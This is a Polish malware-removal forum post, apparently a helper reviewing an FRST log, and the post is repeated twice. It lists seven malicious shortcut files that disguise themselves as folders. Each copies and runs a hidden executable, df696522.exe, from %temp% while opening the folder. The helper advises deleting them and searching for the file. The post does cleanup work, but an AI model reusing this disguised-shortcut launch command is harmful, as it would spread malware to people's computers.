Teraz dopiero widać że skróty odnosiły się to pliku wykonywalnego, być może to jakiś trojan downloader który infekował system i pobierał inną zawartość z sieci (być może ransom) ale nie powiedziane.
Wszystkie te skróty usuń
czarnobyl.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "czarnobyl" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[21/05/2017 - 22:27:37 | A | 1 Ko] - madame elektra wege (2).lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "madame elektra wege" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[27/06/2017 - 15:55:48 | A | 1 Ko] - kurs instruktorski.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "kurs instruktorski" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[16/10/2017 - 20:48:32 | A | 1 Ko] - teledyski do elektry.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "Nowy folder (3)" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:29 | A | 1 Ko] - efka 2017 koncert.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "efka 2017 koncert" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:36 | A | 1 Ko] - M.D. BIELSK ROCKOWANIA 2017.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "M.D. BIELSK ROCKOWANIA 2017" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:45 | A | 1 Ko] - miss got fama 2017.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "miss got fama 2017" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
W FRST okienku szukaj wklej: df696522.exe i klik Szukaj plików i pokaż raport.
Jeśli możesz podaj jako załącznik jakiś .jpg którego nie możesz otworzyć.
Wszystkie te skróty usuń
czarnobyl.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "czarnobyl" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[21/05/2017 - 22:27:37 | A | 1 Ko] - madame elektra wege (2).lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "madame elektra wege" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[27/06/2017 - 15:55:48 | A | 1 Ko] - kurs instruktorski.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "kurs instruktorski" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[16/10/2017 - 20:48:32 | A | 1 Ko] - teledyski do elektry.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "Nowy folder (3)" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:29 | A | 1 Ko] - efka 2017 koncert.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "efka 2017 koncert" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:36 | A | 1 Ko] - M.D. BIELSK ROCKOWANIA 2017.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "M.D. BIELSK ROCKOWANIA 2017" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
[29/03/2019 - 13:53:45 | A | 1 Ko] - miss got fama 2017.lnk --> C:\Windows\system32\cmd.exe/c start explorer.exe "miss got fama 2017" & type "df696522.exe" > "%temp%\df696522.exe" && "%temp%\df696522.exe"
W FRST okienku szukaj wklej: df696522.exe i klik Szukaj plików i pokaż raport.
Jeśli możesz podaj jako załącznik jakiś .jpg którego nie możesz otworzyć.